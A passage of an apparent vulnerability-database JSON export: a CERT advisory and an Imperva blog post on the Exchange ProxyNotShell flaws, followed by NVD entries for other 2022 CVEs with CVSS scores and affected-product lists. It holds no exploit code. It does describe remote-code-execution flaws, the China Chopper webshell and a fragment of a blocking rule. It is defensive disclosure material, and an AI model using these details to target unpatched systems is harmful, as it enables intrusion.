{UrlDecode:{REQUEST_URI}} to ensure all encoded variations are evaluated before being blocked.\n\n#### Apply update when available\n\nAs of October 3, 2022, there is no patch available to mitigate this issue. It is recommended that Microsoft Exchange administrators stay on alert for any advisory or patch released by Microsoft. Note the latest security updates from Microsoft on [October 11th](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>) **do not** address the vulnerabilities highlighted here. 
Even with the workaround in place, many on-premises Microsoft Exchange instances remain at risk until Microsoft provides a patch and the patch has been applied.\n\nOn November 8th 2022, Microsoft provided fixes as part of its Patch Tuesday rollout; see Microsoft's updated guidance at [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) and [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>). \n\n#### Third-party web application protection\n\nExchange administrators who use third-party Web Application Firewall (WAF) products can implement the recommended URL filters and blocks as part of their WAF policy.\n\n#### Other mitigations\n\nExchange administrators can limit outgoing connections from the Exchange Mailbox server using a specific allow list on an outgoing proxy to limit suspicious web requests.\n\nThis document was written by Vijay Sarvepalli.\n\n### Vendor Information\n\n915563\n\n### Microsoft Unknown\n\nNotified: 2022-10-03 Updated: 2022-10-03 **CVE-2022-41040**| Unknown \n---|--- \n**CVE-2022-41082**| Unknown \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Microsoft Vulnerability Research Unknown\n\nNotified: 2022-10-03 Updated: 2022-10-04 **CVE-2022-41040**| Unknown \n---|--- \n**CVE-2022-41082**| Unknown \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### References\n\n * <https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>\n * 
<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>\n * <https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>\n * <https://rw.md/2022/11/09/ProxyNotRelay.html>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-41040 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-41040>) [CVE-2022-41082 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-41082>) \n---|--- \n**API URL: ** | VINCE JSON | CSAF \n**Date Public:** | 2022-10-03 \n**Date First Published:** | 2022-10-03 \n**Date Last Updated: ** | 2022-11-10 01:59 UTC \n**Document Revision: ** | 9 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "cert", "title": "Microsoft Exchange vulnerable to server-side request forgery and remote code execution.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-10T01:59:00", "id": "VU:915563", "href": "https://www.kb.cert.org/vuls/id/915563", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2022-10-13T02:05:20", "description": "On September 29, Microsoft security researchers announced two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082 affecting Microsoft Exchange Server. The vulnerabilities allow remote code execution (RCE) when used in tandem. It is important to note that both require authenticated access to the desired server before exploitation. 
Trend Micro gave the two vulnerabilities severity ratings of 8.8 and 6.3 out of 10, respectively.\n\nAccording to researchers, CVE-2022-41082 is closely related to the [ProxyShell](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>) vulnerability from 2021, CVE-2021-34473. The request string disclosed from the recent exploit is identical to that of last year\u2019s vulnerability, and the mitigation provided by Microsoft is the same as well.\n\nImperva Threat Research has observed considerable related attacker activity targeting last year\u2019s ProxyShell vulnerability (CVE-2021-34473) recently. Threat Research rules and policies may also be picking up attacks targeting the new exploits (CVE-2022-41040 and CVE-2022-41082).\n\n[GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), the company that discovered these vulnerabilities in August, believes that a Chinese threat actor may be behind the attacks observed so far. Per GTSC, the attacks include a Chinese character encoding and the China Chopper webshell for persistent remote access, which is a backdoor commonly used by likely state-sponsored Chinese hacking groups.\n\nGiven existing blocking rules that mitigate the CVE-2021-34473 ProxyShell vulnerability, these new CVEs are mitigated out of the box by both Imperva Cloud WAF and WAF Gateway. If customers wish to implement a manual mitigation based on the advisory from Microsoft, it can be found [here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). 
Microsoft noted that the CVEs only impact on-premises Exchange servers, so Exchange Online customers do not currently need to take any action.\n\nAs always, Imperva Threat Research continues to monitor the situation and will provide updates as new information emerges.\n\nThe post [Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T16:47:34", "type": "impervablog", "title": "Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T16:47:34", "id": "IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "href": "https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": 
"2023-02-09T14:41:57", "description": "Improper validation of some components used by the rollback mechanism in Trend Micro Apex One and Trend Micro Apex One as a Service clients could allow a Apex One server administrator to instruct affected clients to download an unverified rollback package, which could lead to remote code execution. Please note: an attacker must first obtain Apex One server administration console access in order to exploit this vulnerability.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-19T18:15:00", "type": "cve", "title": "CVE-2022-40139", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-40139"], "modified": "2022-09-21T18:43:00", "cpe": ["cpe:/a:trendmicro:apex_one:-", "cpe:/a:trendmicro:apex_one:2019"], "id": "CVE-2022-40139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40139", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:trendmicro:apex_one:2019:*:*:*:*:*:*:*", "cpe:2.3:a:trendmicro:apex_one:-:*:*:*:*:saas:*:*"]}, {"lastseen": "2023-02-09T14:43:35", "description": "Microsoft Office Information Disclosure Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-10-11T19:15:00", "type": "cve", 
"title": "CVE-2022-41043", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41043"], "modified": "2022-12-05T20:23:00", "cpe": ["cpe:/a:microsoft:office:2019", "cpe:/a:microsoft:office_long_term_servicing_channel:2021"], "id": "CVE-2022-41043", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41043", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:macos:*:*", "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:*"]}, {"lastseen": "2023-02-09T14:33:17", "description": "Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-19T15:15:00", "type": "cve", "title": "CVE-2022-35405", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-11-05T02:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_pam360:5.5", "cpe:/a:zohocorp:manageengine_password_manager_pro:12.1", "cpe:/a:zohocorp:manageengine_access_manager_plus:4.3"], "id": "CVE-2022-35405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-35405", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_pam360:5.5:build5500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_password_manager_pro:12.1:build12100:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4302:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:37:56", "description": "Microsoft Office Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-38048", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-12T19:04:00", "cpe": ["cpe:/a:microsoft:office_long_term_servicing_channel:2021", "cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019", "cpe:/a:microsoft:office:2016"], "id": "CVE-2022-38048", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38048", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2019:*:*:*:*:macos:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:rt:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:-:*:*:*", "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:37:42", "description": "Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-37968", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-37968"], "modified": "2022-10-12T15:06:00", "cpe": ["cpe:/a:microsoft:azure_arc-enabled_kubernetes:1.6.19", "cpe:/a:microsoft:azure_stack_edge:-", "cpe:/a:microsoft:azure_arc-enabled_kubernetes:1.7.18", "cpe:/a:microsoft:azure_arc-enabled_kubernetes:1.8.11", "cpe:/a:microsoft:azure_arc-enabled_kubernetes:1.5.8"], "id": "CVE-2022-37968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37968", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:microsoft:azure_arc-enabled_kubernetes:1.6.19:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_arc-enabled_kubernetes:1.7.18:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_arc-enabled_kubernetes:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_arc-enabled_kubernetes:1.8.11:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_stack_edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:44:04", "description": "An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). 
Once pax is installed, amavisd automatically prefers it over cpio.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T02:15:00", "type": "cve", "title": "CVE-2022-41352", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41352"], "modified": "2022-11-09T20:42:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-41352", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41352", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:29:21", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 15.6.1 and iPadOS 15.6.1, macOS Monterey 12.5.1. An application may be able to execute arbitrary code with kernel privileges. 
Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-24T20:15:00", "type": "cve", "title": "CVE-2022-32894", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-32894"], "modified": "2022-12-07T03:02:00", "cpe": [], "id": "CVE-2022-32894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-32894", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2023-02-09T14:43:35", "description": "Windows COM+ Event System Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-41033", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41033"], "modified": "2022-10-13T15:26:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_11:22h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", 
"cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-41033", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41033", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:22h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:22h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:31:52", "description": "Windows CryptoAPI Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-34689", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2022-10-12T14:44:00", "cpe": ["cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-34689", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-34689", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", 
"cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*"]}, {"lastseen": "2023-02-09T14:30:14", "description": "Windows TCP/IP Driver Denial of Service Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-33645", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-33645"], "modified": "2022-10-12T14:42:00", "cpe": ["cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_11:22h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", 
"cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-33645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-33645", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:22h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", 
